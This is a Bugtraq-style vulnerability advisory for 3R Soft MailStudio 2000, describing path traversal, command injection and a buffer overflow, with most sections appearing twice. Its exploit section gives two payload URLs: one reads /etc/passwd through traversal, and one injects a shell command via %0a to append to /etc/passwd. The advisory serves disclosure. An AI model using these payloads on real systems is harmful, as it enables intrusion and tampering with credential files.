3R Soft MailStudio 2000 Multiple Vulnerabilities
BID:1335
Info
3R Soft MailStudio 2000 Multiple Vulnerabilities
| Bugtraq ID: | 1335 |
| Class: | Design Error |
| CVE: |
CVE-2000-0526 CVE-2000-0527 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jun 09 2000 12:00AM |
| Updated: | Jul 11 2009 02:56AM |
| Credit: | File Viewing vulnerability discovered by Naif <[email protected]>, buffer overflow discovered by FuSyS <[email protected]>. Posted in a s0ftpj <http://www.s0ftpj.org > advisory on June 9, 2000. |
| Vulnerable: |
3R Soft MailStudio 2000 2.0 |
| Not Vulnerable: | |
Discussion
3R Soft MailStudio 2000 Multiple Vulnerabilities
MailStudio 2000 is vulnerable to multiple attacks.
It is possible for a remote user to gain read access to all files located on the server via the usage of the "/.." string passed to a CGI, thereby compromising the confidentiality of other users email and password, as well as other configuration and password files on the system.
It is also possible to set a password for those system user accounts which don't have one in place (ex: operator, gopher etc).
There is also a input validation vulnerability in the userreg.cgi. This CGI uses a shell to execute certain commands. Passing any command directly after %0a in the arguments of the CGI will allow a remote user to execute the commands as root.
userreg.cgi also has an unchecked which could allow remote attackers to execute arbitrary code as root.
MailStudio 2000 is vulnerable to multiple attacks.
It is possible for a remote user to gain read access to all files located on the server via the usage of the "/.." string passed to a CGI, thereby compromising the confidentiality of other users email and password, as well as other configuration and password files on the system.
It is also possible to set a password for those system user accounts which don't have one in place (ex: operator, gopher etc).
There is also a input validation vulnerability in the userreg.cgi. This CGI uses a shell to execute certain commands. Passing any command directly after %0a in the arguments of the CGI will allow a remote user to execute the commands as root.
userreg.cgi also has an unchecked which could allow remote attackers to execute arbitrary code as root.
Exploit / POC
3R Soft MailStudio 2000 Multiple Vulnerabilities
s0ftpr0ject <http://www.s0ftpj.org> has provided the following exploits:
Mail view vulnerability:
mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd
userreg.cgi vulnerability:
userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd
Fyodor <[email protected]> has provided the following exploit for the buffer overflow:
s0ftpr0ject <http://www.s0ftpj.org> has provided the following exploits:
Mail view vulnerability:
mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd
userreg.cgi vulnerability:
userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd
Fyodor <[email protected]> has provided the following exploit for the buffer overflow:
Solution / Fix
3R Soft MailStudio 2000 Multiple Vulnerabilities
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].